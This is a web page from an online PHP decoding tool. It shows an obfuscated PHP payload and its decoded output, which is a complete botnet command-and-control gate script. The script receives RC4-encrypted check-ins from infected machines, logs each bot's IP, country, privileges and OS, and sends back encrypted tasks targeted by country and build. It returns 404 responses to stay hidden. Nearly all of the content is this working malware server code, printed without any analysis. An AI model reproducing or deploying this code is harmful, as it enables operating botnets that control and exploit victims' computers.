Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $_='eNqtWA1T20gS/SsTlXaRFy/YLJu7wtEm2BbG2LK9ljBJOJ9LlsegRJYUaRygCP/9+s1YyGAgXN1VqibS..
Decoded Output download
?>b'<?php error_reporting(0);@ini_set("magic_quotes_gpc","Off");include("./config.php");$ccode=array("XX","AF","AX","AL","DZ","AS","AD","AO","AI","A1","AQ","AG","AR","AM","AW","AP","AU","AT","AZ","BS","BH","BD","BB","BY","BE","BZ","BJ","BM","BT","BO","BA","BW","BV","BR","IO","BN","BG","BF","BI","KH","CM","CA","CV","KY","CF","TD","CL","CN","CX","CC","CO","KM","CD","CG","CK","CR","CI","HR","CU","CY","CZ","DK","DJ","DM","DO","EC","EG","SV","GQ","ER","EE","ET","EU","FK","FO","FJ","FI","FR","GF","PF","TF","GA","GM","GE","DE","GH","GI","GR","GL","GD","GP","GU","GT","GG","GN","GW","GY","HT","VA","HN","HK","HU","IS","IN","ID","IR","IQ","IE","IM","IL","IT","JM","JP","JE","JO","KZ","KE","KI","KP","KR","KW","KG","LA","LV","LB","LS","LR","LY","LI","LT","LU","MO","MK","MG","MW","MY","MV","ML","MT","MH","MQ","MR","MU","YT","MX","FM","MD","MC","MN","ME","MS","MA","MZ","MM","NA","NR","NP","NL","AN","NC","NZ","NI","NE","NG","NU","NF","MP","NO","OM","PK","PW","PS","PA","PG","PY","PE","PH","PL","PT","PR","QA","RE","RO","RU","RW","SH","KN","LC","PM","VC","WS","SM","ST","A2","SA","SN","RS","SC","SL","SG","SK","SI","SB","SO","ZA","GS","ES","LK","SD","SR","SJ","SZ","SE","CH","SY","TW","TJ","TZ","TH","TL","TG","TK","TO","TT","TN","TR","TM","TC","TV","UG","UA","AE","GB","US","UM","UY","UZ","VU","VE","VN","VG","VI","WF","EH","YE","ZM","ZW");function rc4Crypt($key, $pt) {$s = array();for ($i=0; $i<256; $i++) {$s[$i] = $i;}$j = 0;$x;for ($i=0; $i<256; $i++) {$j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;$x = $s[$i];$s[$i] = $s[$j];$s[$j] = $x;}$i = 0;$j = 0;$ct = \'\';$y;for ($y=0; $y<strlen($pt); $y++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$x = $s[$i];$s[$i] = $s[$j];$s[$j] = $x;$ct .= $pt[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]);}return $ct;}function return404(){header("HTTP/1.0 404 Not Found");header("Status: 404 Not Found");die();}function getcnum($iplong){$qres=@mysql_query("SELECT cnum FROM geoip WHERE $iplong BETWEEN iplong_start AND iplong_end LIMIT 1");if(mysql_num_rows($qres)){$row=mysql_fetch_row($qres);return $row[0];}else{return 0;}}function SplitData($line){$arr1=explode("|",$line);$result=array();foreach($arr1 as $value){$arr2=explode(":",$value);$result[$arr2[0]]=$arr2[1];unset($arr2);}unset($arr1);return $result;}$data=isset($_COOKIE[\'data\'])?$_COOKIE[\'data\']:file_get_contents("php://input");if(strlen($data)==0){return404();}if(!@mysql_connect($settings[\'mysql_host\'],$settings[\'mysql_user\'],$settings[\'mysql_pass\'])){return404();}if(!@mysql_select_db($settings[\'mysql_db\'])){return404();}$data=SplitData(rc4Crypt($settings[\'rc4key\'],base64_decode($data)));$id=(float)$data[\'id\'];if($id==0){return404();}$cnum=0;if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])){$ips=explode(",",$_SERVER["HTTP_X_FORWARDED_FOR"]);$iplong=sprintf("%u",ip2long(trim($ips[0])));if($iplong!=0 && $iplong!=ip2long("127.0.0.1")){$cnum=getcnum($iplong);}}if(!$cnum){$iplong=sprintf("%u",ip2long($_SERVER["HTTP_X_REAL_IP"]));if($iplong!=0 && $iplong!=ip2long("127.0.0.1")){$cnum=getcnum($iplong);}else{$iplong=sprintf("%u",ip2long($_SERVER["REMOTE_ADDR"]));$cnum=getcnum($iplong);}}$timestamp=time();$nat=$iplong==$data[\'la\']?0:1;$bot_version=(float)$data[\'bv\'];$os_version=(float)$data[\'sv\'];$bid=(float)$data[\'bid\'];$admin=(float)$data[\'ar\'];$x64=(float)$data[\'pa\'];$tid=(float)$data[\'tid\'];$result=(float)$data[\'result\'];$qres=@mysql_query("SELECT id FROM bots WHERE id=$id LIMIT 1") or die();switch(mysql_num_rows($qres)){case 0:@mysql_query("INSERT INTO bots SET id=$id, bid=$bid, ip=$iplong, admin=$admin, x64=$x64, nat=$nat, cnum=$cnum, idate=$timestamp, ldate=$timestamp, bot_version=$bot_version, os_version=$os_version, ltask=0") or die();if($settings[\'accept_new_installs\']==false){@mysql_query("INSERT INTO blacklist SET id=$id") or die();return404();}break;case 1:if($tid){@mysql_query("UPDATE bots SET ltask=$tid, ldate=$timestamp WHERE id=$id LIMIT 1") or die();if($result){@mysql_query("UPDATE tasks SET executed=executed+1 WHERE id=$tid LIMIT 1") or die();}else{@mysql_query("UPDATE tasks SET failure=failure+1 WHERE id=$tid LIMIT 1") or die();}exit;}else{@mysql_query("UPDATE bots SET ip=$iplong, admin=$admin, x64=$x64, bid=$bid, nat=$nat, cnum=$cnum, ldate=$timestamp, bot_version=$bot_version, os_version=$os_version WHERE id=$id LIMIT 1") or die();}break;}$qres=@mysql_query("SELECT id FROM blacklist WHERE id=$id LIMIT 1") or die();if(mysql_num_rows($qres)==1){return404();}$dir=opendir("./plugins");while($plugname=readdir($dir)){if($plugname=="." || $plugname==".." || !is_dir("./plugins/".$plugname)){continue;}if(file_exists("./plugins/$plugname/gate.php")){include("./plugins/$plugname/gate.php");}}$qres=@mysql_query("SELECT ltask,cnum FROM bots WHERE id=$id LIMIT 1") or die();$arr=mysql_fetch_assoc($qres);$cc=$ccode[$arr[\'cnum\']];$query="SELECT * FROM tasks WHERE enabled=1 AND executed<downmax AND id>$arr[ltask] ORDER BY id";$qres=@mysql_query($query) or die();unset($content);$cl=5;while($arr=mysql_fetch_assoc($qres)){if($arr[\'countries\']!="*" && strpos($arr[\'countries\'],$cc)===false){continue;}if($arr[\'botid\']!="*" && strpos($arr[\'botid\'],sprintf("%08X",$id))===false){continue;}if($arr[\'buildid\']!="*" && strpos($arr[\'buildid\'],sprintf("%08X",$bid))===false){continue;}$content.=pack("C",$arr[\'command\']).pack("V",$arr[\'id\']).$arr[\'parameter\']."";$cl+=6+strlen($arr[\'parameter\']);}header("Content-Type: application/octet-stream");header("Content-Length: $cl");$content=pack("V",$settings[\'reqrate\']).$content."";echo(pack("V",crc32($content)));die(rc4Crypt(pack("V",$id),$content)); ?>'<?php die();
Did this file decode correctly?
Original Code
<?php $_='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';$__=create_function('','?>'.gzuncompress(base64_decode($_)).'<?php die();');$__(); ?>
Function Calls
null | 1 |
gzuncompress | 1 |
base64_decode | 1 |
create_function | 1 |
Stats
MD5 | 6f9ba5efbc938c638ebb19b6efc072e8 |
Eval Count | 1 |
Decode Time | 95 ms |